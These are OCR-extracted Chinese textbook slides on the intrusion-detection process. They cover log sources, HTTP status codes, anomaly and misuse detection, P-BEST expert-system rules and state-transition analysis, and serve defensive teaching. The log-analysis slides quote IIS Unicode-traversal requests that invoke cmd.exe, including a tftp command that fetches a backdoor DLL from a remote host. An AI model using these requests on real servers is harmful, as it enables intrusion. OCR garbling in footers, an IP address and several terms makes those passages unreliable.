入侵檢測流程

￡戶■瞽通離等載聲“十一五”國家級規(guī)劃教材

?

第章▲21世記鬲-楨

4偃0安生.制說PCE

入侵檢測流程入侵檢測技術(shù)

?II元大主*

?薛齡蠟R則0而8城裝

曹元大主編,人民郵電出版社,2007年

多人民郵電出版社入侵檢測流程1

費POSTS&[ELECOMPRESS

第4章入侵檢測流程

入侵檢測流程:

□入侵檢測的過程

□入侵檢測系統(tǒng)的數(shù)據(jù)源

□入侵分析的概念

□入侵分析的模型

□入侵檢測的分析方法

□告警與響應(yīng)

多人民郵電出版社入侵檢測流程2

方FOS15&1ELECOMPRESS

入侵檢測的過程

:人民郵電出版社入侵檢測流程3

rOSTS&TELECOMPRESS

信息收集

□入侵檢測的第一步是信息收集，收集內(nèi)容包括系統(tǒng)、網(wǎng)絡(luò)、

數(shù)據(jù)及用戶活動的狀態(tài)和行為

□需要在計算機(jī)網(wǎng)絡(luò)系統(tǒng)中的若干不同關(guān)鍵點（不同網(wǎng)段和不

同主機(jī)）收集信息

。盡可能擴(kuò)大數(shù)據(jù)收集范圍

。從一個源來的信息有可能看不出疑點，進(jìn)行多點收集。

多人民郵電出版社入侵檢測流程4

費POSTS&[ELECOMPRESS

信息收集

口入侵檢測很大程度上依賴于收集信息的

可靠性和正確性

口入侵檢測系統(tǒng)軟件本身應(yīng)具有相當(dāng)強(qiáng)的

堅固性，防止被篡改而收集到錯誤的信

多人民郵電出版社入侵檢測流程5

費POSTS&[ELECOMPRESS

信息收集的來源

□系統(tǒng)或網(wǎng)絡(luò)的日志文件

□網(wǎng)絡(luò)流量

□系統(tǒng)目錄和文件的異常變化

□程序執(zhí)行中的異常行為

多人民郵電出版社入侵檢測流程6

BOSTS&TELECOMPRESS

信息分析

■模式匹配

■統(tǒng)計分析

■完整性分析，往往用于事后分析

人民郵電出版社入侵檢測流程7

rOSTS&TELECOMPRESS

模式匹配

□模式匹配就是將收集到的信息與已知的網(wǎng)絡(luò)入侵和系統(tǒng)誤用模

式數(shù)據(jù)庫進(jìn)行比較，從而發(fā)現(xiàn)違背安全策略的行為

□一般來講，一種攻擊模式可以用一個過程（如執(zhí)行一條指令）

或一個輸出（如獲得權(quán)限）來表示。該過程可以很簡單（如通

過字符串匹配以尋找一個簡單的條目或指令），也可以很復(fù)雜

（如利用正規(guī)的數(shù)學(xué)表達(dá)式來表示安全狀態(tài)的變化）

多人民郵電出版社入侵檢測流程8

費POSTS&[ELECOMPRESS

統(tǒng)計分析

□統(tǒng)計分析方法首先給系統(tǒng)對象（如用戶、文件、目錄和設(shè)備

等）創(chuàng)建一個統(tǒng)計描述，統(tǒng)計正常使用時的一些測量屬性（如

訪問次數(shù)、操作失敗次數(shù)和延時等）

□測量屬性的平均值和偏差將被用來與網(wǎng)絡(luò)、系統(tǒng)的行為進(jìn)行比

較，任何觀察值在正常值范圍之外時，就認(rèn)為有入侵發(fā)生

人民郵電出版社入侵檢測流程9

H)S15&TELECOMPKKSS

完整性分析

□完整性分析主要關(guān)注某個文件或?qū)ο笫欠癖桓?/p>

□這經(jīng)常包括文件和目錄的內(nèi)容及屬性

□在發(fā)現(xiàn)被更改的、被安裝木馬的應(yīng)用程序方面特別有效

多人民郵電出版社入侵檢測流程10

方FOS15&1ELECOMPRESS

告警與響應(yīng)

□當(dāng)一個攻擊事件被檢測出來以后，IDS就應(yīng)該根據(jù)入侵

事件的類型或性質(zhì)做出相應(yīng)的告警與響應(yīng)。常見的方

式有：

o自動終止攻擊過程；

□終止用戶連接；

□禁止用戶賬號；

□重新配置防火墻阻塞攻擊的源地址；

O向管理控制平臺發(fā)出警告指出事件的發(fā)生；

o向網(wǎng)絡(luò)管理平臺發(fā)出SNMPTRAP;

。記錄事件的日志，包括日期、時間、源地址、目的地址、描

述與事件相關(guān)的原始數(shù)據(jù)；

□執(zhí)行一個用戶自定義程序

多人民郵電出版社入侵檢測流程11

費POSTS&[ELECOMPRESS

IDS的數(shù)據(jù)源

□基于主機(jī)的數(shù)據(jù)源

O系統(tǒng)運行狀態(tài)信息

O系統(tǒng)記賬信息

O系統(tǒng)日志

oC2級安全性審計信息

□基于網(wǎng)絡(luò)的數(shù)據(jù)源

oSNMP信息

□網(wǎng)絡(luò)通信包

□應(yīng)用程序日志文件

□報警信息

□其它網(wǎng)絡(luò)設(shè)備和安全產(chǎn)品的信息

多人民郵電出版社入侵檢測流程12

POSTS&PRESS

Windows日志監(jiān)測

□1.Windows日志

□Windows中也一4羊使用“事件查看器”來管理日志系

統(tǒng)，也同樣需要用系統(tǒng)管理員身份進(jìn)入系統(tǒng)后方可進(jìn)

行操作，如圖所示。

副流程13

多人民郵電出SI工

rOSTS&TELECOMPRESS

口通常有應(yīng)用程序日志，安全日志、系統(tǒng)日志、DNS服

務(wù)器日志、FTP日志、WWW日志等等，可能會根據(jù)服

務(wù)器所開啟的服務(wù)不同而略有變化。啟動Windows

時，事件日志服務(wù)會自動啟動，所有用戶都可以查看

“應(yīng)用程序日志”，但是只有系統(tǒng)管理員才能訪問

“安全日志”和“系統(tǒng)日志”。系統(tǒng)默認(rèn)的情況下會

關(guān)閉“安全日志”，但我們可以使用“組策略”來啟

用“安全日志”開始記錄。安全日志一旦開啟，就會

無限制的記錄下去，直到裝滿時停止運行。

口應(yīng)用程序日志、安全日志、系統(tǒng)日志、DNS日志默認(rèn)

位置：%systemroot%\system32\config,默認(rèn)文件大小

512KB，但有經(jīng)驗的系統(tǒng)管理員往往都會改變這個默

認(rèn)大小。

殄人民郵電出版袒入侵檢測流程14

費POSTS&[ELECOMPRESS|

□安全日志文件：

□c:\systemroot\system32\config\SecEvent.EVT

□系統(tǒng)日志文件：

□c:\systemroot\system32\config\SysEvent.EVT

□應(yīng)用程序日志文件：

□c:\systemroot\system32\config\AppEvent.EVT

□Internet信息服務(wù)FTP日志默認(rèn)位置：c:\systemroot\sys

tem32\logfiles\msftpsvc1\。

□Internet信息服務(wù)WWW日志默認(rèn)位置：

c:\systemroot\system32\logfiles\w3svc1\o

多人民郵電出版社入侵檢測流程15

費POSTS&[ELECOMPRESS

□Windows2000中提供了一個叫做安全日志分析器

(CyberSafeLogAnalyst,CLA)的工具，有很強(qiáng)的日志

管理功能。

□一旦黑客在獲得服務(wù)器的系統(tǒng)管理員權(quán)限之后就可以

隨意破壞系統(tǒng)上的文件了，包括日志文件，想要隱藏

自己的入侵蹤跡，就必須對日志進(jìn)行修改。

□對事件日志移位能做到很好的保護(hù)。移位雖是一種保

護(hù)方法，但只要在命令行輸入dirc:\*.evt/s(如系統(tǒng)安

裝在D盤，則盤符為D),一下就可查找到事件日志位

置。

殄人民郵電出版袒入侵檢測流程16

費POSTS&[ELECOMPRESS|

多人民郵電出版社入侵檢測流程17

費POSTS&[ELECOMPRESS

2.日志分析

口面對龐大的日志記錄，我們就會需要使用工具

對日志進(jìn)行分析、匯總，日志分析可以幫助用

戶從日志記錄中獲取有用的信息，以便用戶可

以針對不同的情況采取必要的措施。

多人民郵電出版社入侵檢測流程18

費POSTS&[ELECOMPRESS

□例1:分析網(wǎng)站在服務(wù)器上的訪問日志是站長的

工作之一，在平時做搜索優(yōu)化時，我們分析百

度，谷歌等搜索引擎有沒有訪問自己的網(wǎng)站并

有沒有成功獲取內(nèi)容的一個方法就是分析網(wǎng)站

的日志文件，這樣就可以了解并找出自己的網(wǎng)

站為什么不收錄。

多人民郵電出版社入侵檢測流程19

rOSTS&TELECOMPRESS

WWW日志舉例

□4--[02/Jul/2006:15:30:41+0800]

66GET/seoblog/2006/04/17/user-friendly-website/HTTP/l.l55

20019031

“/swcMPRADA%B9%D9%B7%BD%CD

%F8%D5%BE&cl=3〃6iMozilla/4.0(compatible;MSIE6.0;

WindowsNT5.1;SV1;AlexaToolbar)59

多人民郵電出版社入侵檢測流程20

7HOSTS&TELECOMPRESS

□4是IP

□[02/Jul/2006:15:30:41+0800]前面是日期，0800是時區(qū)；

□“GET是服務(wù)器的動作，不是GET就是POSP；GET是從服務(wù)器上

獲取內(nèi)容；

□/seoblog/2006/04/17/user-friendly-website/HTTP/1.1使用HTML1.1

協(xié)議獲取相關(guān)內(nèi)容200是返回狀態(tài)碼，200是成功獲?。?04是文

件沒找到；401是需要密碼，403禁止查看，500服務(wù)器錯誤。

19031是文件大小

□^/swd=PRADA%B9%D9%B7%BD%CD%F8

%D5%BE&cl=3"表示來路"Mozilla/4.0(compatible;MSIE6.0;

WindowsNT5.1;SV1;AlexaToolbar)”表示的是用戶所使用的電

腦是與Netscape兼容的Mozilla瀏覽器，WindowsNT操作系統(tǒng)，瀏

覽器是IE6.0,裝有AlexaToolbar。

殄人民郵電出版袒入侵檢測流程21

費POSTS&[ELECOMPRESS|

口又如：25-dsmith

[10/Oct/1999:21:15:05+0500]"GET/index.html

HTTP/1.0"2001043

;人民郵電出版社入侵檢測流程22

rOSTS&TELECOMPRESS

常見狀態(tài)碼

□2xx成功

□200正常；請求已完成。

口201正常；緊接POST命令。

□202正常；已接受用于處理，但處理尚未完

成。

口203正常；部分信息一返回的信息只是一部

分。

□204正常；無響應(yīng)一已接收請求，但不存在要

回送的信息。

多人民郵電出版社入侵檢測流程23

方FOS15&1ELECOMPRESS

□3xx重定向

□301永久轉(zhuǎn)向一請求的數(shù)據(jù)具有新的位置且更改是永

久的。

□302暫時轉(zhuǎn)向一請求的數(shù)據(jù)臨時具有不同URI。

□303請參閱其它一可在另一URI下找到對請求的響

應(yīng)，且應(yīng)使用GET方法檢索此響應(yīng)。

□304文件未修改一未按預(yù)期修改文檔，也就是客戶端

緩沖版本還可以繼續(xù)使用。

□305使用代理一必須通過位置字段中提供的代理來訪

問請求的資源。

□306未使用一不再使用；保留此代碼以便將來使用。

多人民郵電出版社入侵檢測流程24

費POSTS&[ELECOMPRESS

□4xx客戶機(jī)中出現(xiàn)的錯誤

□400非法請求一請求中有語法問題，或不能滿足請

求。

□401未授權(quán)一未授權(quán)客戶機(jī)訪問數(shù)據(jù)。

□402需要付款一表示計費系統(tǒng)已有效。

□403禁止訪問一即使有授權(quán)也不需要訪問。

口404找不到一服務(wù)器找不到給定的資源；文檔不存

在。

□407代理認(rèn)證請求一客戶機(jī)首先必須使用代理認(rèn)證自

身。

□415介質(zhì)類型不受支持一服務(wù)器拒絕服務(wù)請求，因為

不支持請求實體的格式。

殄人民郵電出版袒入侵檢測流程25

費POSTS&[ELECOMPRESS|

□5xx服務(wù)器中出現(xiàn)的錯誤

□500內(nèi)部錯誤一因為意外情況，服務(wù)器不能完

成請求或者服務(wù)器內(nèi)部錯誤，通常是程序有問

題。

□501未執(zhí)行一服務(wù)器不支持請求的工具。

□502錯誤網(wǎng)關(guān)一服務(wù)器接收到來自上游服務(wù)器

的無效響應(yīng)。

□503無法獲得服務(wù)一由于臨時過載或維護(hù)，服

務(wù)器無法處理請求，例如負(fù)載過大等。

殄人民郵電出版袒入侵檢測流程26

費POSTS&[ELECOMPRESS|

□有經(jīng)驗的管理員就可通過安全日志、FTP日

志和WWW日志來確定入侵者的IP地址以及

入侵時間。

口虛擬主機(jī)開通成功之后，會在您的FTP里面

自動生成4個文件夾，分別是：

“databases"；logofnes”,"others“Jwwwroot”。

多人民郵電出版社入侵檢測流程27

費POSTS&[ELECOMPRESS

□wwwroot文件夾：該文件夾內(nèi)存放可以通過

web訪問的文件，您需要將您對外發(fā)布的網(wǎng)站

文件上傳到該目錄下，輸入域名訪問到的文件

將是該文件夾下的文件。

口databases文件夾：該文件夾同logofiles、others

文件夾一樣，屬于示可遢過web訪問的文件

夾，即用戶無法通過輸入網(wǎng)址來訪問這些文件

夾下的文件，您可以在這些文件夾下上傳一些

不希望別人能夠訪問的文件。比如您可以將

access數(shù)據(jù)庫存放在databases文件夾下，這樣可

以最大化的保證您的數(shù)據(jù)庫安全。

殄人民郵電出版袒入侵檢測流程28

費POSTS&[ELECOMPRESS|

□logofiles文件夾：logoflles文件夾是日志文件，

該文件夾存放您的網(wǎng)站日志文件。通過日志文

件您可以查詢到網(wǎng)站的一些訪問記錄。

□others文件夾：該站點存放您自定義的nS錯誤

文件。IIS默認(rèn)的一些錯誤提示，比如404錯

誤，403錯誤，500錯誤等等，如果您覺得這些

錯誤提示不夠個性化，您可以將您自定義的錯

誤提示上傳到該目錄下。

夠人民郵電出版社入侵檢測流程29

POS15&TELECOMPRESS

3.利用日志發(fā)現(xiàn)入侵蹤跡

口我們一般使用系統(tǒng)日志、防火墻、檢查IP報頭(IP

header)的來源地址、檢測Email的安全性以及使用入侵

檢測系統(tǒng)(IDS)等來判斷是否有入侵跡象。

□有經(jīng)驗的系統(tǒng)管理員就會利用一些日志審核工具、過

濾日志記錄工具，最大程度的將日志文件利用起來，

就必須先制定管理計劃。

□(1)指定日志做哪些記錄工作？

□(2)制定可以得到這些記錄詳細(xì)資料的觸發(fā)器。

多人民郵電出版社入侵檢測流程30

費POSTS&[ELECOMPRESS

Unicode漏洞入侵日志記錄

□如通過下面的編碼查看目標(biāo)機(jī)的目錄文件：

□GET/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+dir200

則日志中會記錄下此訪問行為：

2003-03-0108:47:47-1880GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+dir200-

多人民郵電出版社入侵檢測流程31

費POSTS&[ELECOMPRESS

□而下面一行是向我們的機(jī)器傳送后門程序的記錄：

2003-03-0108:47:47-1880GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+tftp%20-i%2029%20GET%20cool.dll%20c:\httpodbc.dll

502-

多人民郵電出版社入侵檢測流程32

費POSTS&[ELECOMPRESS

入侵分析的概念

□入侵檢測系統(tǒng)是一個復(fù)雜的數(shù)據(jù)處理系統(tǒng)，所涉及

到的問題域中的各種關(guān)系也比較復(fù)雜。

□從入侵檢測的角度來說，分析是指針對用戶和系統(tǒng)

活動數(shù)據(jù)進(jìn)行有效的組織、整理并提取特征，以鑒

別出感興趣的行為。這種行為的鑒別可以實時進(jìn)

行，也可以事后分析，在很多情況下，事后的進(jìn)一

步分析是為了尋找行為的責(zé)任人。

多人民郵電出版社入侵檢測流程33

方FOS15&1ELECOMPRESS

入侵分析的目的

口重要的威懾力：目標(biāo)系統(tǒng)使用IDS進(jìn)行入侵分析，對

于入侵者來說具有很大的威懾力，因為這意味著攻

擊行為可能會被發(fā)現(xiàn)或被追蹤。

□安全規(guī)劃和管理：分析過程中可能會發(fā)現(xiàn)在系統(tǒng)安

全規(guī)劃和管理中存在的漏洞，安全管理員可以根據(jù)

分析結(jié)果對系統(tǒng)進(jìn)行重新配置，避免被攻擊者用來

竊取信息或破壞系統(tǒng)。

□獲取入侵證據(jù)：入侵分析可以提供有關(guān)入侵行為詳

細(xì)的、可信的證據(jù)，這些證據(jù)可以用于事后追究入

侵者的責(zé)任。

多人民郵電出版社入侵檢測流程34

方FOS15&1ELECOMPRESS

入侵分析應(yīng)考慮的因素

□需求

□子目標(biāo)

□目標(biāo)劃分

□平衡

多人民郵電出版社入侵檢測流程35

費POSTS&[ELECOMPRESS

入侵分析的模型

入侵分析處理過程可分為三個階段:

□構(gòu)建分析器；

□分析數(shù)據(jù)；

□反饋和更新。

人民郵電出版社入侵檢測流程36

H)S15&TELECOMPRESS

構(gòu)建分析器

□收集并生成事件信息

□預(yù)處理信息

□建立行為分析引擎

□將事件數(shù)據(jù)輸入引擎中

□保存已輸入數(shù)據(jù)的模型

人民郵電出版社入侵檢測流程37

H)S15&TELECOMPRESS

分析數(shù)據(jù)

□輸入事件記錄

□事件預(yù)處理

□比較事件記錄和知識庫

□產(chǎn)生響應(yīng)

人民郵電出版社入侵檢測流程38

rOSTS&TELECOMPRESS

反饋和更新

□反饋和更新是一個非常重要的過程。

口在誤用檢測系統(tǒng)中，反映這個階段的主要功能是攻擊

信息的特征數(shù)據(jù)庫是否可以更新。每天都能夠根據(jù)新

攻擊方式的出現(xiàn)來更新攻擊信息特征數(shù)據(jù)庫是非常重

要的。許多優(yōu)化的信號引擎能夠在系統(tǒng)正在監(jiān)控事件

數(shù)據(jù)，沒有中斷分析過程的同時，由系統(tǒng)操作員來更

新信號數(shù)據(jù)庫。

□在異常檢測系統(tǒng)中，依靠執(zhí)行異常檢測的類型，歷史

統(tǒng)計特征輪廓被定時更新。例如，在第1個入侵檢測系

統(tǒng)IDES中，每天都進(jìn)行特征輪廓的更新。每個用戶的

摘要資料被加入知識庫中，并且刪除最老的資料。

殄人民郵電出版袒入侵檢測流程39

費POSTS&[ELECOMPRESS|

入侵檢測分析方法

用于誤用檢測的關(guān)鍵技術(shù)

用于異常檢測的關(guān)鍵技術(shù)

人民郵電出版社入侵檢測流程40

rOSTS&TELECOMPRESS

異常入侵檢測模型

口人民郵電出版衽入侵檢測流程41

rOSTS&TELECOMPRESS

異常檢測

異常檢測模型

:人民郵電出版社入侵檢測流程42

rOSTS&TELECOMPRESS

異常檢測

1.前提：入侵是異?；顒拥淖蛹?/p>

2.用戶輪廓(Profile):通常定義為各種行為參數(shù)及其

閾值的集合，用于描述正常行為范圍

3.過程

監(jiān)控分量化分比較》判定

.

修正

4.指標(biāo)：漏報(々/se夕。sil/re),錯報negative)

多人民郵電出版社入侵檢測流程43

方FOS15&1ELECOMPRESS

異常檢測

□如果系統(tǒng)錯誤地將正常活動定義為入侵，稱為誤報

(falsepositive)；如果系統(tǒng)未能檢測出真正的入侵行為

則稱用漏報(falsenegative)。

□特點：異常檢測系統(tǒng)的效率取決于用戶輪廓的完備性

和監(jiān)控的頻率。因為不需要對每種入侵行為進(jìn)行定

義，因此能有效檢測未知的入侵。同時系統(tǒng)能針對用

戶行為的改變進(jìn)行自我調(diào)整和優(yōu)化，但隨著檢測模型

的逐步精確，異常檢測會消耗更多的系統(tǒng)資源。

殄人民郵電出版袒入侵檢測流程44

費POSTS&[ELECOMPRESS|

異常檢測

□神經(jīng)網(wǎng)絡(luò)方法

□免疫系統(tǒng)方法

□遺傳算法

口基于代理的檢測

多人民郵電出版社入侵檢測流程45

費TELECOMPRESS

誤用入侵檢測技術(shù)

□誤用入侵檢測的主要假設(shè)是具有能夠被精確地

按某種方式編碼的攻擊，并可以通過捕獲攻擊

及重新整理，確認(rèn)入侵活動是基于同一弱點進(jìn)

行攻擊的入侵方法的變種。

□1、基于模式匹配誤用入侵檢測方法

□2、基于專家系統(tǒng)誤用入侵檢測方法

□3、基于狀態(tài)遷移分析誤用入侵檢測方法

□4、基于鍵盤監(jiān)控誤用入侵檢測方法

□5、基于模型誤用入侵檢測方法

人民郵電出版社入侵檢測流程46

H)S15&TELECOMPKKSS

誤用入侵檢測模型

殄人民郵電出版社入侵檢測流程47

rOSTS&TELECOMPRESS

誤用檢測方法

□模式匹配方法：基于模式匹配的誤用入侵檢測方法是

最基本的誤用入侵檢測方法，該方法將已知的入侵特

征轉(zhuǎn)換成模式，存放于模式數(shù)據(jù)庫中，在檢測過程

中，模式匹配模型將到來的事件與入侵模式數(shù)據(jù)庫中

的入侵模式進(jìn)行匹配，如果匹配成功，則認(rèn)為有入侵

行為發(fā)生。

□專家系統(tǒng)方法：基于專家系統(tǒng)的誤用入侵檢測方法是

最傳統(tǒng)、最通用的誤用入侵檢測方法。在諸如MIDAS、

IDES、下一代IDES(NIDES)、DIDS和CMDS中都使用了

這種方法。在MIDAS、IDES和NIDES中,應(yīng)用的產(chǎn)品系

統(tǒng)是P-BEST,該產(chǎn)品由AlanWhithurst設(shè)計。而DIDS

和CMDS,使用的是CLIPS系統(tǒng)，是由美國國家航空和宇

航局開發(fā)的系統(tǒng)。

殄人民郵電出版袒入侵檢測流程48

費POSTS&[ELECOMPRESS|

入侵檢測的專家系統(tǒng)

在最早期的若干入侵檢測系統(tǒng)中就已經(jīng)開始使用專家

系統(tǒng)了。專家系統(tǒng)在知識庫的基礎(chǔ)上，根據(jù)所獲得的事實

和已知的規(guī)則進(jìn)行推導(dǎo)，并得出結(jié)論。使用專家系統(tǒng)的好

處是用戶無須了解具體系統(tǒng)內(nèi)部的工作原理，只需要解決

對問題的描述過程即可。但是，知識庫的構(gòu)建是一個耗時

費力的艱苦過程。

專家系統(tǒng)只能基于明確的、可靠的規(guī)則得出結(jié)論，對

于超出已有規(guī)則范圍的事實無法得出有用的結(jié)論。

下面以PBEST為例，介紹專家系統(tǒng)在入侵檢測中的應(yīng)

用。

殄人民郵電出版袒入侵檢測流程49

費POSTS&[ELECOMPRESS|

PBEST系統(tǒng)包括一個規(guī)則翻譯器pbcc、一個運

行時例程庫和一組垃圾收集例程。規(guī)則翻譯器接收

一組規(guī)則（rule）和事實（fact）的定義后，生成一

組C語言的例程，用來“斷言”（assert）事實和處

理規(guī)則。運行時例程庫中包含了所有專家系統(tǒng)中的

共享代碼，并且包括支持交互式專家系統(tǒng)引擎的例

程。這些交互式的環(huán)境將能夠幫助用戶查看程序的

運行情況、設(shè)置和清除斷點、刪除和“斷言”事實

以及觀察規(guī)則點火的影響軌跡等。

在構(gòu)建一個專家系統(tǒng)之前，用戶必須首先定義規(guī)

則）和模式類型（ptype）。下面是一個ptype的聲

明示例o

ptype[countvalue:int]

殄人民郵電出版袒入侵檢測流程50

費POSTS&lELECFM

以上聲明的目的在于建立一個關(guān)于事實的模式

(pattern)或模板(template)o專家系統(tǒng)知識庫中

的每條事實都是某個ptype類型的一個實例。ptype

類型為count的事實包含一個整數(shù)字段value。前述

聲明將允許規(guī)則引用count類型的事實，并檢查和修

改這些事實的value字段值。對于某一個給定類型，

總是存在多條事實與之對應(yīng)。

一個模式類型ptype可以包括多個字段，如下所示。

ptype[sessionuserid:string,

terminal:string,

timeoutflag:int]

以上ptype聲明建立了一個事實模式，包括了3個字

段，其中,userid和terminal字段都是字符串類型，而

:人民郵視電成出版的社tflag字段為整數(shù)類型。入侵檢測流程51

rOSTS&TELECOMPRESS

規(guī)則可以引用特定事實，其包括匹配特定條件或值

的字段。例如，一條規(guī)則可以檢查一個session類型

的事實，視其timeoutflag字段值是否為1。這可以通

過在其前提句中包含以下語句來實現(xiàn)：

[+sessiontimeoutflag==1]

在起始方括號后的“+”符，是用作某種類型的

“存在性量詞”。這就是說，它允許規(guī)則來查看是

否存在任何滿足特定條件的事實。以上的語句將匹

配任何其timeoutflag字段值為1的session類型的事

實。

規(guī)則也可以使用符，來確定是否不存在給定

類型的事實。下例將查看是否不存在userid字段為

THISUSER的session類型的事實。

殄人民郵電出版社userid==“THISUSER"]入侵檢測流程52

方HOS&1ELECOMPRESS

==>

[/c|value+=l]

etc."'Incrementcountfact5svaluefield

注意，這里對事實的字段值做了修改。此時，原始

的事實失效，而具有修改后字段值的新事實將被加

入到知識庫中。如果使用交互式操作環(huán)境時，用戶

就能看到當(dāng)一個事實被修改后，它將得到一個新的

號碼。這表示系統(tǒng)將把規(guī)則優(yōu)先綁定到修改后的事

實上，而不是先前創(chuàng)建但是已經(jīng)失效的事實。

下面是一個完整的規(guī)則聲明：

rule[SimuLogon(#1;*):

[+tr:transaction]

[+se:session|userid==tr.userid]

[?|se.terminal!=tr.terminal]

:人民郵電出版社入侵檢測流程53

'K)S15&TELECOMPRESS

[!|printf(SimuLogon:user%satterminals%s,%s\\n,

tr.userid,tr.terminal,se.terminal)]

Htr]

[-|se]]

該條規(guī)則檢測一個正在當(dāng)前終端上登錄，但是以前

已經(jīng)在別處登錄的用戶。它通過檢查若干

transaction事實(這些事實必須是以前用戶1已聲明

transaction類型的實例)，看其是否存在一個

session事實，其userid字段值與任何transaction事實

中對應(yīng)字段值相同。如果存在這樣的session事實，

則比較二者的terminal字段值，看是否相同。如果

不相同，則該規(guī)則“點火”。這條規(guī)則的假設(shè)前提

是其他的規(guī)則將檢查登錄活動，并為每個登錄活動

創(chuàng)建一個session事實。

:人民郵電出版社入侵檢測流程54

'K)S15&TELECOMPRESS

一條規(guī)則的語法完全由分隔符（方括號和==＞）來

決定。

一個規(guī)則聲明由關(guān)鍵詞rule起頭，然后是一個名稱

區(qū)，后跟一個冒號（:）。上述規(guī)則的名稱區(qū)包括

名稱SimuLogon,后面是一組包括在圓括號內(nèi)的選

項參數(shù)。這里，#1選項表示該規(guī)則的等級為1。這

意味著如果多個規(guī)則都可以點火，則該規(guī)則將比較

低級別的規(guī)則先點火。星號（*）選項表示該規(guī)則

是可重復(fù)的。這意味著該規(guī)則可以重復(fù)點火，而無

需其他規(guī)則同時點火。若默認(rèn)則表示該規(guī)則是不可

重復(fù)的，因為一旦規(guī)則的前提被滿足，它將永遠(yuǎn)都

滿足條件，則規(guī)則將一次次地點火。但上述規(guī)則將

刪除滿足條件的事實，從而避免類似的循環(huán)點火過

程。

多人民郵電出版社入侵檢測流程55

牙POS15&1ELECOMPRESS

規(guī)則的體部分包括一系列的前提語句、分隔符==>

和一系列的結(jié)論語句。每個前提語句都包括某種條

件測試。第一條前提語句：

[+tr:transaction]

檢查一條transaction事實。它賦以其別名tr。下一條

語句：

[+se:session|userid==tr.userid]

檢查是否存在一個session事實,其userid字段值與

已發(fā)現(xiàn)的tr事實的對應(yīng)字段值相等。如果發(fā)現(xiàn)這樣

的一個事實，則賦予別名se。第三條語句：

[?|se.terminal!=tr.terminal]

檢查在發(fā)現(xiàn)的session事實中的terminal字段值是否與

transaction事實的對應(yīng)字段值不同。

:人民郵電出版社入侵檢測流程56

'K)S15&TELECOMPRESS

如果上述的所有前提語句都滿足了，該規(guī)則“點

火”，即結(jié)論語句開始執(zhí)行。此條規(guī)則包括3條結(jié)

論語句。第一條語句：

[!|printf("SimuLogon:user%satterminals%s,%s\\n",

tr.userid,tr.terminal,se.terminal)]

調(diào)用對應(yīng)的C語言函數(shù)。“！I”符表示這樣的一個

調(diào)用。這里可以調(diào)用任意的C函數(shù)例程。pbcc能夠

識別大多數(shù)內(nèi)建的C函數(shù)，如果是用戶自己創(chuàng)建

的，則必須事先聲明。這里，可以像C語言中的結(jié)

構(gòu)一樣，引用事實中的字段值，表示形式為事實的

別名，后跟點號和字段名。

語句[-[tr]和[-耐將tr和se類型的事實從知識庫中刪

除。這樣做有3個原因：第一，可以避免規(guī)則因為

人民郵電出版社入侵檢測流程57

H)S15&TELECOMPRESS

同樣的滿足條件而循環(huán)點火。第二，將不造要也事

實從知識庫中刪除，有助于提高系統(tǒng)的運行速度。

第三個原因是節(jié)約內(nèi)存。

入侵檢測流程58

多人民郵電出版社

t*OSI、&TELECOMPRESS

基于狀態(tài)轉(zhuǎn)移分析的入侵檢測技術(shù)

基于狀態(tài)轉(zhuǎn)移分析的入侵檢測模型，最初的明

確概念是在20世紀(jì)90年代初由美國加州大學(xué)圣巴巴

拉分校的Porras和Ilgun盤出并實凱的。最新一代的

采用STAT技術(shù)的系統(tǒng)稱為NetSTAT系統(tǒng)，其特點

是脫離了單純進(jìn)行主機(jī)入侵檢測的結(jié)構(gòu)，實現(xiàn)了分

布式的入侵檢測架構(gòu)?；跔顟B(tài)轉(zhuǎn)移分析的檢測模

型，將攻擊者的入侵行為描繪為一系列的特征操作

及其所引起的一系列系統(tǒng)狀態(tài)轉(zhuǎn)換過程，從而使得

目標(biāo)系統(tǒng)從初始狀態(tài)轉(zhuǎn)移到攻擊者所期望的危害狀

TLXO

人民郵電出版社入侵檢測流程59

H)S15&TELECOMPRESS

在狀態(tài)轉(zhuǎn)移分析技術(shù)中，具體采用“狀態(tài)轉(zhuǎn)移

圖”來表示一個具體的入侵攻擊過程。STAT系統(tǒng)

在狀態(tài)轉(zhuǎn)移圖和目標(biāo)系統(tǒng)審計記錄的基礎(chǔ)上，不斷

跟蹤攻擊者在完成整個攻擊工程中所必須完成的每

個關(guān)鍵步驟。

多人民郵電出版社入侵檢測流程60

POS15&1ELECOMPRESS

此種檢測方法明顯不同于其他的基于審計記錄直

接匹配的檢測技術(shù)，它所具有的優(yōu)點如下：

①直接采用審計記錄序列來表示攻擊行為的方法

不具備直觀性。而STAT采用高層的狀態(tài)轉(zhuǎn)移

表示方法來表示攻擊過程，避免了這一問題。

②對于同一種攻擊行為可能對應(yīng)著不同的審計記

錄序列，這些不同審計記錄序列可能僅僅因為

一些細(xì)微的差別而無法被采用直接匹配技術(shù)的

檢測系統(tǒng)察覺，而STAT可以較好地處理這種

情況。

殄人民郵電出版袒入侵檢測流程61

費POSTS&lELECFM

③STAT能夠檢測到由多個攻擊者所共同發(fā)起的協(xié)

同攻擊，以及跨越多個進(jìn)程的攻擊行為。另外，

STAT的一大特色就是具備在某種攻擊行為尚未造

成實質(zhì)危害時，就及時檢測到并采取某種響應(yīng)措施

的能力。

多人民郵電出版制入侵檢測流程62

從本質(zhì)上看，STAT屬于基于規(guī)則分析的濫

用入侵檢測系統(tǒng)，因此只能檢測到已知的攻擊類

型，但是STAT能夠較好地處理已知攻擊類型的變

種行為。

狀態(tài)轉(zhuǎn)移圖就是對攻擊行為的圖形化表示方

法。狀態(tài)轉(zhuǎn)移圖由兩個基本組件構(gòu)成：表示系統(tǒng)

狀態(tài)的結(jié)點和表示特征行為的弧線，如圖所示。

多人民郵電出版社入侵檢測流程63

多^BOSTS&TELECOMPRESS

斗大態(tài)(State)操作(Action)

圖狀態(tài)轉(zhuǎn)移圖的基本組件

;人民郵電出版社入侵檢測流程64

rOSTS&TELECOMPRESS

狀態(tài)轉(zhuǎn)移圖通常包括一個初始狀態(tài)、一個最終

狀態(tài)以及若干攻擊行為步驟，及其引起的若干中間

狀態(tài)，如圖所示。

Action

初始狀態(tài)

圖狀態(tài)轉(zhuǎn)移圖的示意

殄人民郵電出版社入侵檢測流程65

rOSTS&TELECOMPRESS

在構(gòu)建狀態(tài)轉(zhuǎn)移圖的過程中，通常只選取那些

最能代表攻擊過程并同時引起系統(tǒng)狀態(tài)改變的關(guān)鍵

操作。對于每個具體的攻擊行為，都可能存在不同

